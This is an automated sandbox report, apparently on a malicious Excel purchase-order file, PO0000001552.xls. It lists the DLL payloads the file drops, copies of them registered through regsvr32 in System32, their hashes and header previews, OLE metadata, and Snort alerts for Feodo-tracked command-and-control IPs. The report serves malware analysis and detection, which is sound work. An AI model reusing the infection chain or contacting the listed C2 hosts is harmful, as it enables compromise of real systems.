MD5:	322904D0B0020748A8ABC41788D78D9F
SHA1:	4CD879E03CEA5D5FEAEAB7BD9614BD392BADD8D1
SHA-256:	BF4C38ADA89E2623EC0AE27071BA770C6B7AE2966C93717F05B109E2FEDD38E4
SHA-512:	B90C3082BCFB5DC3F0A4D5E653DAA94950B3D7CFF1B14864291DBBC0775DEB5081F81033C916EA78C6E3A36F3CCCC22C612B0D158769E6C6A7FDA891CE33C9C5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-11-13T18:26:46">.. Build: 16.0.15905.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	338423
Entropy (8bit):	5.1629516010869905
Encrypted:	false
SSDEEP:	1536:42/zodZJr6KP+1u6uSivsUQK75IthK8nF2XuN:VOr6KP+1u6uSivsUQK75IthYXU
MD5:	4FF54C343D309A7F69BD16B392F8C3A3
SHA1:	AC4012E403854396974652804E46E5406B23E492
SHA-256:	DBD62290F655ACCC6686A46A62909475980AA09102B3A0D7BAF2278B4DBA56AC
SHA-512:	0268D2B5D833AECB6AD08619F8C08254958978C66CEE156B61A52FE442AB5DB0F9BD12FF9D3CFC1C2E2A2858A8D8D32D2AE361DF3D9610E135A97A12664E0E9B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8418307979091164
Encrypted:	false
SSDEEP:	48:uiTrlKxsxxHxl9Il8utFJfX3b5y2R1eN66LY0d1rc:vTYrFJfX4iQYz
MD5:	3AE033F53B76D362C4A93629A0419482
SHA1:	14ED84431F31521E6327C666D1D2EC766E392016
SHA-256:	8C47A04565A320D35B265549BC11BED0BDCB001BCC28028638B4C8330324A270
SHA-512:	140863AA0784A3A57F4E0F9C0020A895E5D3FAE80ADF5F01EF80CA346B5C8CE4293FD788C0C43B685E3BD1BFD953A8155DF1E4AA647D3CCEA8C39F49AAD10E26
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.I.i.4.J.X.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.907754828884943
Encrypted:	false
SSDEEP:	48:uiTrlKxJx+xl9Il8uaz7HYRtKu9pEV2EpNYn549Ymca2d/vc:vYMPHQGV2EpNaYnT
MD5:	25F51D45674CF9EC3EEEFA2D89F736B0
SHA1:	50A2C33FE720343EDFFC4DCBA09F832901FD819A
SHA-256:	46DC8D20C16586691C4ED93B0B45AE530C67837B927BD79314D4EA62FD1C4FDE
SHA-512:	D8D4709354EC7D3A66CB79CA0C3DF507B67CEF3B4AD63344694DAA5FB03C99F8A88A81659E1B53F949167B929AF0B5DD7A9C94044D460F21C1757466065CA5FD
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".F.+.R.0.9.1.4.W.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\9aad439831564ef9f88438a70a63c87e26ef3852.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	3902
Entropy (8bit):	3.9837858181337045
Encrypted:	false
SSDEEP:	96:GzYVH0Ed0sgxZ/xv8uyIefnFVIaBy5LgVtNKrkqq:6pEerxhxvxyIGVyFgVt8Lq
MD5:	B14B26190EE6FABE32EAB2F9EE926454
SHA1:	84F8AE7E2451837C856F2ABF6AC98CD24B0B4EE9
SHA-256:	071A156E540064BA81D051C98C3F2317E0ECE6440D2C76E6E5A40F17959B9983
SHA-512:	E437437F20A6B6D8CE7FB1BDB73E5001F1B85D7A678202A98DB56D282C17FE712159BD276AE307E5130F546B1CB0D7CA820398E561B059FDBC63DFB2C9EE38ED
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.q.1.D.m.D.F.W.T.v.n.4.h.D.i.n.C.m.P.I.f.i.b.v.O.F.I.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.I.W.6.x.Y.3.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO0000001552.LNK

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 30 12:46:13 2022, mtime=Sun Nov 13 17:26:48 2022, atime=Sun Nov 13 17:26:48 2022, length=93184, window=hide
Category:	dropped
Size (bytes):	527
Entropy (8bit):	4.687349495162638
Encrypted:	false
SSDEEP:	6:4xtQl37wc4esXsbxSXzK9wm2PholjAlpYelsgFUiILlaWUdPFmJXSZXASzZXyav8:87c4xsbx4zK9wm2SjA0Jaldi3Fm2
MD5:	732950BB2A1CFEF84B6969CFFE0ABDE7
SHA1:	D674D7EFF59B48E8A8749F8D5C2801B6E3CE87DA
SHA-256:	6FDB0C9FA6FC38384EE7B77C0D481EBF5F9D771C29739A7DAF62E54626568E28
SHA-512:	290B32795635A528AD9CF40553B7ABFB6D44CD2558C4DF37F92E30B585562982D4E60253F7CE6F55F95BE5F8C6AC4ABEC0C1ABE45148FCB66C9D6BD9BE40A4CB
Malicious:	false
Preview:	L..................F.... ....:..v...(.!~.....R.~.....l......................p.n.2..l..mUU. .PO0000~1.XLS..R.......U.mmUU......^....................q...P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.......X...............-.......W...........;S.......C:\Users\user\Desktop\PO0000001552.xls..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.`.......X.......134349..........N...n..O...}R......i(..........N...n..O...}R......i(..........E.......9...1SPS..mD..pH.H@..=x.....h....H....F.5./EG.gM.U..............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Generic INItialization configuration [xls]
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.363995491825093
Encrypted:	false
SSDEEP:	3:bDuMJltOvCpulmMYdvCpulv:bCmOaEYdac
MD5:	F9CBF4D309E73196DBCB3C5F14717F77
SHA1:	26353BE9CD1B9EBDCE83B69267B48D80472BC7A6
SHA-256:	7CB5B3C956A55B3E4A70A8DA7615CAF7D7960B89BFE00C0EC8553680BF87150F
SHA-512:	47D359B978738F514DD3735DF520D1ACF9A55EAAF49C9A30D902342F345D74CCA24D323ABD0CC75CE7C2AAB3CA0FBACD2E62F07624AF55501CA39355E8EB552B
Malicious:	false
Preview:	[folders]..Templates.LNK=0..PO0000001552.LNK=0..[xls]..PO0000001552.LNK=0..

C:\Users\user\elv2.ooocccxxx

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\elv3.ooocccxxx

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 10 07:26:07 2022, Security: 0
Entropy (8bit):	5.506793373203057
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	PO0000001552.xls
File size:	93184
MD5:	ecdc3f1e9afd2ce212a12ba3a844f521
SHA1:	0121ba555dfe0b42834759d201cce505bd619f86
SHA256:	1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
SHA512:	0b3f8566d8e4c49a0698f398e1d1e95ba6f750ccc25f204b1e9526ff6ef6f81e3131f70779ee88365ad65851d21ddeaefd20dab203cdba39b24c1d1a920dec9e
SSDEEP:	1536:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgHbCXuZH4gb4CEn9J4ZvX5:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgF
TLSH:	3B933A86B2F9D89DEA19C734889B4390A762EC204B564BCB3244F3A67FB0D501F539D7
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74f4e4c2cec4c0d4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PO0000001552.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Code Page:	1251
Author:
Last Saved By:
Create Time:	2015-06-05 18:19:34
Last Saved Time:	2022-11-10 07:26:07
Creating Application:
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.3985130586395627
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . $ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 24 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e1 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2784985381370367
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 82874

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	82874
Entropy:	5.92856896968195
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953	TCP	2404316	ET CNC Feodo Tracker Reported CnC Server TCP group 9	49712	443	192.168.2.3	182.162.143.56
192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49709	7080	192.168.2.3	45.63.99.23
192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	63177	53	192.168.2.3	1.1.1.1
192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49705	443	192.168.2.3	173.255.211.88

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 19:26:49.746951103 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:49.746999025 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:49.747102022 CET	49697	443	192.168.2.3	175.98.167.165
